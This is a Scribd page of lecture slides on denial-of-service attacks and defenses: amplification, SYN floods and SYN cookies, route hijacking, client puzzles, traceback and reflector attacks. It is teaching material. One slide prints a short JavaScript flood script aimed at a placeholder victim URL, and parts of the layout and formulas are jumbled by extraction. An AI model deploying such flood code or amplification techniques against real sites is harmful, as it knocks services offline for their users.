0% found this document useful (0 votes)
25 views

Course Notes-Denial of Service Attacks

1) The first document matches DOS attack classifications (hitlist scanning, random scanning, etc.) with their descriptions. 2) The second document matches spoofing techniques (random spoofing, fixed spoofing, subnet spoofing) with their descriptions. 3) The third document matches DOS attack targets (infrastructure, server applications, network access) with their descriptions.

Uploaded by

khalid anjum
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
25 views

Course Notes-Denial of Service Attacks

1) The first document matches DOS attack classifications (hitlist scanning, random scanning, etc.) with their descriptions. 2) The second document matches spoofing techniques (random spoofing, fixed spoofing, subnet spoofing) with their descriptions. 3) The third document matches DOS attack targets (infrastructure, server applications, network access) with their descriptions.

Uploaded by

khalid anjum
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 62

DOS Taxonomy: Quiz One

Match the DOS attack classification with its description.


Attacks: Descriptions:
4 Random Scanning 1. A portion of a list of targets is supplied to
a compromised computer.
2 Permutation Scanning
2. All compromised computers share a
3 Signpost Scanning
common pseudo-random permutation of the
1 Hitlist Scanning IP address space.
3. Uses the communication patterns of the
compromised computer to find new target.
4. Each compromised computer probes
random addresses.
DOS Taxonomy: Quiz Two
Match the DOS attack classification with its description.

Attacks: Descriptions:
1. Generate 32-bit numbers and stamp
2 Subnet Spoofing
packets with them.
1 Random Spoofing
2. Generate random addresses within
3 Fixed Spoofing a given address space.
3. The spoofed address is the address
of the target.
DOS Taxonomy: Quiz Three
Match the DOS attack classification with its description.

Attacks: Descriptions:
2 Server Application 1. The motivation of this attack is a
crucial service of a global internet
3 Network Access
operation, for example core router
1 Infrastructure
2. The attack is targeted to a specific
application on a server
3. The attack is used to overload or
crash the communication mechanism of a
network.
Network DoS:

Goal: take out a large site with little computing

How:
Amplification
Small number of packets

BIG EFFECT
Network DoS:

Two types of amplification attacks:

DoS bug: DoS flood:

Design flaw allowing one Command botnet to


Machine to disrupt a service Generate flood of requests
Network DoS:
DoS can happen at any layer

Sample DoS at different layers:

Link
TCP/UDP
Application

Sad truth: Current internet not designed to handle DDoS attacks


Amplification Quiz
NTP – Network Time
Protocol

Used to synchronize
machines and their
clocks.
Amplification Quiz
Which of these are reasons why the UDP-based NTP
protocol is particularly vulnerable to amplification attacks?
Select all that are true.

A small command can generate a large response.

Vulnerable to source IP spoofing.

It is difficult to ensure computers communicate only with


legitimate NTP severs.
Amplification Example
Amplification Attack!
Amplification Example
March 2013 DNS Amplification attack: (x50 amplification)
DnS Query EDNS Response
v Target
SrcIP: DoS
v
(3000 bytes)
(60 bytes)

DoS DoS
Source Target
DNS Server

2006: 0.58M open resolvers on Internet (Kaminsky-Shiffman)

2014: 28M open resolvers (openresolverproject.org)

March 2013: DDoS attack generating 309 Gbps for 28 mins


IP Header Format
Version Header Length
Type of Service
Connectionless
Total Length
Identification
Flags Fragment Offset
Time to Live
Unreliable Protocol
Header Checksum
Source Address of Originating Host
Destination Address of Target Host
Best Effort Options
Padding
IP Data
TCPHeader Format

Session Source Port Dest Port


Based
SEQ Number
ACK Number
Congestion U A P P S F
control R C S S Y I
G K H R N N

Other stuff
In order
delivery
TCP Handhake
C S
SNC randC
SYN:
ANC 0 Listening

SNS randS
SYN/ACK: Store SNC, SNS
ANS SNC +1

SNC SNC +1
ACK: Wait
AN SNS +1

Established
TCP SYN Flood I: low rate (DoS Bug)
C S
Single machine:
SYNC1
SYN Packets with random SYNC2
source IP addresses
SYNC3
Fills up backlog queue on server
SYNC4
No further connections possible
SYNC5
TCP SYN Flood I
A classic SYN flood example

MS Blaster worm (2003) MS Solution


new name:
Infected machines at noon on Aug 16th: windowsupdate.microsoft.com
SYN flood on port 80 to windowsupdate.com
50 SYN packets every second
each packet is 40 bytes
Spoofed source IP: a.b.X.Y where X,Y random
TCP SYN Flood I

Low rate SYN flood defenses

Non-solution: Correct Solution:

Increase backlog queue size Syncookies: remove state from


or decrease timeout server

Small performance overhead


SYN COOKIES

Idea: use secret key and data in packet to generate server SN

Server responds to Client with SYN-ACK cookie: Honest client responds with
ACK ( AN=SNS +1, SN=SNC+1 ):
T = 5-bit counter incremented every 64 secs.
L = MACkey (SAddr, SPort, DAddr, DPort, SNC, T) Server allocates space for
[24 bits] socket only if valid SNS
key: picked at random during boot
SNS = (T . mss . L) ( |L| = 24 bits )
Server does not save state
Syn Cookies Quiz
Select all the true statements:
SYN cookies require modified versions of TCP

SYN cookies lead to overall slower performance

The server must reject all TCP options because the server
discards the SYN queue entry
SYN Floods II: Massive flood

Command bot army to flood specific target: (DDoS)

20,000 bots can generate 2Gb/sec of SYNs (2003)


At web site:
Saturates network uplink or network router
Random source IP attack SYNs look the
same as real SYNs
SYN Floods II: Massive flood
Prolexic / CloudFlare

Idea: only forward established TCP connections to site

Lots-of-SYNs

Lots-of-SYN/ACKs Prolexic Forward


Proxy to site
Fewer ACKs
Stronger attacks: TCP connection flood

Command bot army:

Complete TCP connection to web site


Send short HTTP HEAD request
Repeat
Will bypass SYN flood protection proxy but:

Attacker can no longer use random source IPs


Reveals location of bot zombies
Proxy can now block or rate-limit bots
A real-world example: GitHub(3/2015)

Javascript-based DDoS:

Github.com

Inject
Honest End Popular
imageFlood.js
User Server
A real-world example: GitHub(3/2015)
imageFlood.js
Function imgflood() {
var TARGET = ‘victim-website.com/index.php?’
var rand = Math.floor(Math.random() * 1000)
var pic = new Image()
Pic.src = ‘http://’+TARGET+rand+’=val’
}
setInterval(imgflood,10)
Flood Attack Quiz
With regards to a UDP flood attack, which of the
following statements are true:

Attackers can spoof the IP address of their UDP packets

The attack can be mitigated using firewalls

Firewalls cannot stop a flood because the firewall is


susceptible to flooding.
DoS via route hijacking
3491, 17557
AS 3327 208.65.153.0/24 AS 3491
Linx PCCW
Telecom
17557
AS 25462 208.65.153.0/24
RETN Ltd AS 17557
Pakistan
Telcom

AS 36561 AS 18173
AS 18173 AS 58467
YouTube Allied Bank Lahore Stock Aga Khan
AS 365561
208.65.153.0/22 Pakistan Exchange University
Includes 210 IP Addr
DoS via route hijacking DETOUR

Timeframe:

100% at 10:30am

0% at 10:45am
DoS via route hijacking DETOUR

China Telecom, China Telecom – DC, China Telecom – DC


66.174.161.0/24

Level 3, Verizon, Verizon-W., Verizon-W.


66.174.161.0/24

LEGEND
LEVEL 3
PEER
CUSTOMER
NETWORK TRAFFIC
DoS at Higher Levels

SSL/TLS handshake [SD’03]

Client Hello

Server Hello (pub-key)

Client key exchange

RSA RSA
Encrypt Decrypt
DoS Mitigation
Client puzzles

Moderately hard problem: Idea: slow down


attacker
Given challenge C find X such that
LSBn ( SHA-1( C || X ) ) = 0n
Assumption: takes expected 2n time to solve
For n=16 takes about .3sec on 1Ghz machine

Main point: checking puzzle solution is easy.


DoS Mitigation
Client puzzles

During DoS attack: When no attack:


Everyone must submit Do not require puzzle
puzzle solution with solution
requests
DoS Mitigation
Client puzzles: Examples

TCP connection floods (RSA ‘99)

Example challenge: C = TCP server-seq-num


First data packet must contain puzzle solution
Otherwise TCP connection is closed
DoS Mitigation
Client puzzles: Examples

SSL handshake DoS: (SD’03)

Challenge C based on TLS session ID


Server: check puzzle solution before RSA decrypt

Same for application layer DoS and payment DoS


DoS Mitigation
Client puzzles: Benefits and limitations

Hardness of challenge: n

Decided based on DoS attack volume

Limitations:
Requires changes to both clients and servers
Hurts low power legitimate clients during attack:
Clients on cell phones and tablets cannot connect
DoS Mitigation
Client puzzles: Memory-bound functions

CPU power ratio:

high end server / low end cell phone = 8000


Impossible to scale to hard puzzles

Interesting observation:
Main memory access time ratio:
high end server / low end cell phone = 2
DoS Mitigation
Better puzzles

Solution requires many main memory accesses

Dwork-Goldberg-Naor, Crypto ‘03

Abadi-Burrows-Manasse-Wobber, ACM ToIT ‘05


Puzzle Quiz

Which of the following statements are true?

Client puzzles should be hard to construct. This is an


indication of the level of difficulty to solve them.

Client puzzles should be stateless

Puzzle complexity should increase as the strength of the


attack increases.
DoS Mitigation - CAPTCHAs
CAPTCHA
Completely Automated Public Turing test to tell Computers and Humans Apart

Idea: verify that


connection is from
a human

Are you
human?
DoS Mitigation - CAPTCHAs
CAPTCHA
Completely Automated Public Turing test to tell Computers and Humans Apart

Applies to application layer Idea: verify that


DDoS [Killbots ’05]
connection is from
During attack: generate a human
CAPTCHAs and process request
only if valid solution
Present one CAPTCHA per source IP address
DoS Mitigation: Source Identification

Goal: identify packet source

Ultimate goal: block attack at the source


DoS Mitigation: Source Identification
Ingress Filtering

ISP

Internet
DoS Mitigation: Source Identification
Ingress Filtering
Drop all packets with source address
other than 204.69.207.0/24

Internet
204.69.207.0/24

Ingress filtering policy: ISP only forwards packets with legitimate source IP
DoS Mitigation: Source Identification
Ingress Filtering - Implementation problems

ALL ISPs must do this. Requires global trust.


If 10% of ISPs do not implement no defense
No incentive for deployment Recall: 309 Gbps
attack used only
2014: 3 networks (3/2013)

25% of Auto. Systems are fully spoofable (spoofer.cmand.org)


13% of announced IP address space is spoofable
DoS Mitigation: Traceback
Traceback [Savage et al. ’00]

Goal:
How: change routers to
Given set of attack packets record info in packets
Determine path to source

Assumptions:
Most routers remain uncompromised
Attacker sends many packets
Route from attacker to victim remains relatively stable
DoS Mitigation: Traceback
Simple Method:

Write path into network packet:


Each router adds its own IP address to packet
Victim reads path from packet

Problems:
Requires space in packet
Path can be long
No extra fields in current IP format
Changes to packet format too much to expect
DoS Mitigation: Traceback
Better Idea

DDoS involves many packets on same path

Store one link in each packet


Each router probabilistically stores
own address
Fixed space regardless of path length
Traceback Quiz
Which of the following are assumptions that can be
made about Traceback?

Attackers can generate limited types of packets

Attackers may work alone or in groups

Attackers are not aware of the tracing mechanism


DoS Mitigation: Edge Sampling

Data fields written to packet:

Edge: start and end IP addresses


Distance: number of hops since edge stored
DoS Mitigation: Edge Sampling
Marking procedure for router R:

if coin turns up heads (with


probability p) then
else

write R into start address if distance == 0 write R into


write 0 into distance field end field
increment distance field
DoS Mitigation: Edge Sampling

Packet received

R1 receives packet from source or another router

Packet contains space for start, end, distance

Packet s e d

R1 R2 R3
DoS Mitigation: Edge Sampling

Begin writing edge

R1 chooses to write start of edge

Sets distance to 0

Packet R1 0

R1 R2 R3
DoS Mitigation: Edge Sampling

Finish writing edge


R2 chooses not to overwrite edge
Distance is 0
Write end of edge, increment distance to 1

Packet R1 R2 1

R1 R2 R3
DoS Mitigation: Edge Sampling

Increment distance
R3 chooses not to overwrite edge
Distance > 0
Increment distance to 2

Packet R1 R2 2

R1 R2 R3
DoS Mitigation: Edge Sampling

Path reconstruction
Extract information from attack packets
Build graph rooted at victim
Each (start,end,distance) tuple provides an edge
# packets needed to reconstruct path

E(X) < In(d)


p(1-p)d-1
where p is marking probability, d is length of path
Edge Sampling Quiz
Select all the statements that are true for edge
sampling:

Multiple attackers can be identified since edge identifies


splits in reverse path

It is difficult for victims to reconstruct a path to the attacker

Requires space in the IP packet header


Reflector Attack [Paxson ’01]

Victim is flooded by all of the data Attacker spoof’s Victim’s IP and sends
3 sent from the DNS Servers 1 DNS query to many DNS Servers

2 All DNS servers respond to the DNS


query and send data to Victim’s IP
Reflector Attack [Paxson ’01]

Examples:

DNS Resolvers: UDP 53 with victim.com source


At victim: DNS response
Web servers: TCP SYN 80 with victim.com source
At victim: TCP SYN ACK packet
Gnutella servers
Reflector Attack [Paxson ’01]
Request:src=victim, reply:src=reflector
det=reflector det=vitim

VICTIM

MASTER
Reflectors
Control traffic send streams
Directs slaves of non-spoofed
at victim, but unsolicited
reflectors traffic to
victim.
Reflector Attack Quiz
Self defense against reflector attacks should
incorporate:
Filtering - filter DNS traffic as close to the victim as
possible.

Server redundancy - servers should be located in multiple


networks and locations.

Traffic limiting - traffic from a name server should be limited


to reasonable thresholds.
Capability Based Defense

Preventing internet denial-of-service


Anderson, Roscoe, Wetherall
with capabilities. SIGCOMM ‘04.

Siff: A stateless internet flow filter to


Yaar, Perrig, and Song mitigate DDoS flooding attacks. IEEE
S&P ’04.

A DoS-limiting network architecture.


Yang, Wetherall, Anderson
SIGCOMM ’05
Capability Based Defense

Basic idea:
Receivers can specify what packets they want

How:

Sender requests capability in SYN packet


Path identifier used to limit # reqs from one source
Receiver responds with capability
Sender includes capability in all future packets
Capability Based Defense

Main point: Routers only forward:


Request packets, and
Packets with valid capability
Capabilities can be revoked if source is attacking
Blocks attack packets close to source

R1 R2 R3 R4
DEST
Source As Transit As Dest As
DoS Summary

Denial of Service attacks are real.


Must be considered at design time.

Sad truth:
Internet is ill-equipped to handle DDoS attacks
Commercial solutions: CloudFlare, Prolexic

Many good proposals for Internet core redesign.

You might also like